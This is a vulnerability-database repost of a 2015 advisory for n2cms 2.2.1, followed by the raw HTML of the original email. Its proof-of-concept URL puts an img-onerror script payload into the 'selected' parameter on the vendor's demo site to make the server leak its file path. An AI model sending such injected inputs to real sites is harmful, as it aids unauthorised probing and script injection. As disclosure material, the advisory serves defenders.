Vulners
Lucene search
n2cms 2.2.1 Path Disclosure
`# Affected software: n2cms
# Type of vulnerability:full path disclosure
# URL:n2cms.com
# Discovered by: provensec
# Website: provensec.com
#version: *2.2.1* <http://n2cms.codeplex.com/releases>
# Proof of concept
http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=%2fupload%2f%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E1.php%2f
manipulating the selected paramter will splash error which discloses system
path
--047d7bd6bb5a40b6a5051578e115
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr"><div class=3D"gmail_default" style><span style=3D"font-fam=
ily:'comic sans ms',sans-serif"></span><font face=3D"comic sans ms,=
sans-serif"># Affected software: n2cms</font></div><div class=3D"gmail_def=
ault" style><font face=3D"comic sans ms, sans-serif"># Type of vulnerabilit=
y:full path disclosure</font></div><div class=3D"gmail_default" style><font=
face=3D"comic sans ms, sans-serif"># URL:<a href=3D"http://n2cms.com">n2cm=
s.com</a></font></div><div class=3D"gmail_default" style><font face=3D"comi=
c sans ms, sans-serif"># Discovered by: provensec</font></div><div class=3D=
"gmail_default" style><font face=3D"comic sans ms, sans-serif"># Website: <=
a href=3D"http://provensec.com">provensec.com</a></font></div><div class=3D=
"gmail_default" style><font face=3D"comic sans ms, sans-serif"><br></font><=
/div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-s=
erif">#version:=A0</font><a href=3D"http://n2cms.codeplex.com/releases" sty=
le=3D"color:rgb(0,150,219);text-decoration:none;font-family:Georgia,serif;f=
ont-size:14.3999996185303px"><strong>2.2.1</strong></a><span style=3D"color=
:rgb(51,51,51);font-family:Georgia,serif;font-size:14.3999996185303px">=A0<=
/span></div><div class=3D"gmail_default" style><font face=3D"comic sans ms,=
sans-serif"># Proof of concept</font><span style=3D"font-family:'comic=
sans ms',sans-serif"></span></div><div class=3D"gmail_default" style><=
span style=3D"font-family:'comic sans ms',sans-serif"><br></span></=
div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-se=
rif"><a href=3D"http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selecte=
d=3D%2fupload%2f%22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f">=
http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=3D%2fupload%2f=
%22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f</a><br></font><br=
><br></div><div class=3D"gmail_default" style><br></div><div class=3D"gmail=
_default" style><br>manipulating the selected paramter will splash error wh=
ich discloses system path=A0</div><div class=3D"gmail_default" style><br></=
div><div class=3D"gmail_default" style>=A0</div></div>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 May 2015 00:00Current
7.4High risk
Vulners AI Score7.4